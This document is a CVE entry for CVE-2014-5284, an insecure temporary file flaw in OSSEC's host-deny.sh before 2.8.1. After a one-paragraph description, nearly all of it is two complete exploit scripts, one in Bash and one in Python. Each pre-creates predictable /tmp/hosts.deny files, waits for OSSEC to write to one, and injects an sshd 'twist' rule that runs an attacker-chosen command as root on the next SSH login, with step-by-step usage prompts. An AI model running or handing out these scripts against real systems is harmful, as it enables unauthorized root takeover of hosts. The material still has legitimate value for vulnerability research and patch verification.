CVE-2014-5284_OSSEC_before_2.8.1權限提升漏洞

# CVE-2014-5284 OSSEC before 2.8.1權限提升漏洞
==INFO==
host-deny.sh in OSSEC before 2.8.1 writes to temporary files with predictable filenames without verifying ownership, which allows local users to modify access restrictions in hosts.deny and gain root privileges by creating the temporary files before automatic IP blocking is performed.

==CVE-2014-5284.sh==

#!/bin/bash

### CVE-2014-5284
### Exploit Title: ossec 2.8 Insecure Temporary File Creation Vulnerability Privilege Escalation
### Python is nice but doesn't work all the time
### Exploit Author: mbadanoiu

# Python Exploit Author: skynet-13
# Vendor Homepage: www.ossec.net/
# Software Link: https://github.com/ossec/ossec-hids/archive/2.8.1.tar.gz
# Version: OSSEC  - 2.8

# Created from Research by
# Jeff Petersen
# Roka Security LLC
# jpetersen@rokasecurity.com
# Original info at https://github.com/ossec/ossec-hids/releases/tag/2.8.1

function create_files {
	echo "=============================================="
	echo "Creating /tmp/hosts.deny.300 through /tmp/hosts.deny.65536 ..."

	for i in $range; do
		echo -n > /tmp/hosts.deny.$i
	done
}

function watch_files {
	echo "=============================================="
        echo "Monitoring tmp for file change...."
        echo "ssh into the system a few times with an incorrect password"
        echo "Then wait for up to 10 mins"
        echo "=============================================="

	####insert non-empty logic here
	"$inotifywait" -e close_write /tmp/ --include "hosts.deny." |
	while read -r dir events file; do
		on_file_change "$dir$file"
		break
	done
}

function on_file_change {
	local file="$1"
	echo "File: $file has just been modified"
	write_exploit_to_file "$file"
}

function write_exploit_to_file {
	local file="$1"
	echo " sshd : ALL : twist $cmd " > "$file"	###Don't waste time with printing

	echo 'Writing exploit to this file'
	echo "=============================================="
        echo " ssh in again to execute the command"
        echo "=============================================="
        echo "               End Prog."
	exit
}

function verify_inotifywait {
	if [ ! -f "$inotifywait" ]; then
		inotifywait=$(which inotifywait)
		if [ ! "$inotifywait" ]; then
			echo -e "\nNo inotifywait found on the target!"
			echo "Configure and make inotify-tools then run this script again:"
			echo -e "\tcd inotify-tools && ./autogen.sh && ./configure && make\n"
			exit
		fi
	fi
}

#####MAIN######
cmd="$1"

if [ -z "$cmd" ]; then
	echo "Usage of program:"
	echo -e "\tbash $0 "
	exit
fi

range=$(seq 300 65535)

SCRIPT=$(realpath "$0")
SCRIPTPATH=$(dirname "$SCRIPT")
inotifywait="$SCRIPTPATH/inotify-tools/src/inotifywait"

verify_inotifywait

create_files
watch_files

==ossec_host_deny.py==

#!/usr/bin/python
# Exploit Title: ossec 2.8 Insecure Temporary File Creation Vulnerability Privilege Escalation
# Date: 14-11-14
# Exploit Author: skynet-13
# Exploit Modifier: mbadanoiu
# Vendor Homepage: www.ossec.net/
# Software Link: https://github.com/ossec/ossec-hids/archive/2.8.1.tar.gz
# Version: OSSEC  - 2.8
# Tested on: Ubunutu x86_64
# CVE : 2014-5284

# Created from Research by
# Jeff Petersen
# Roka Security LLC
# jpetersen@rokasecurity.com
# Original info at https://github.com/ossec/ossec-hids/releases/tag/2.8.1

# Run this on target machine and follow instructions to execute command as root

from twisted.internet import inotify
from twisted.python import filepath
from twisted.internet import reactor
import os
import optparse
import signal


class HostDenyExploiter(object):

    def __init__(self, path_to_watch, cmd):
        self.path = path_to_watch
        self.notifier = inotify.INotify()
        self.exploit = cmd

    def create_files(self):
        print "=============================================="
        print "Creating /tmp/hosts.deny.300 through /tmp/hosts.deny.65536 ..."

        for i in range(300, 65536):
            filename = "/tmp/hosts.deny.%s" % i
            f = open(filename, 'w')
            f.write("")
            f.close()

    def watch_files(self):
        print "=============================================="
        print "Monitoring tmp for file change...."
        print "ssh into the system a few times with an incorrect password"
        print "Then wait for up to 10 mins"
        print "=============================================="
        self.notifier.startReading()
        self.notifier.watch(filepath.FilePath(self.path), callbacks=[self.on_file_change])

    def write_exploit_to_file(self, path):
        print 'Writing exploit to this file'
        f = open(str(path).split("'")[1], 'w')
        f.write(' sshd : ALL : twist %s \n' % self.exploit)
        f.close()
        print "=============================================="
        print " ssh in again to execute the command"
        print "=============================================="
        print "               End Prog."
        os.kill(os.getpid(), signal.SIGUSR1)

    def on_file_change(self, watch, path, mask):
	file=str(path).split("'")[1]
        print 'File: ', file, ' has just been modified'
	if 'hosts.deny' in file:
	        self.notifier.stopReading()
        	self.write_exploit_to_file(path)


if __name__ == '__main__':
    parser = optparse.OptionParser("usage of program \n" + "-c Command to run as root in quotes\n")
    parser.add_option('-c', dest='cmd', type='string', help='Used to specify a command to run as root')
    (options, args) = parser.parse_args()
    cmd = options.cmd
    if options.cmd is None:
        print parser.usage
        exit(0)
    ex = HostDenyExploiter('/tmp', cmd)
    ex.create_files()
    ex.watch_files()
    reactor.run()
    exit(0)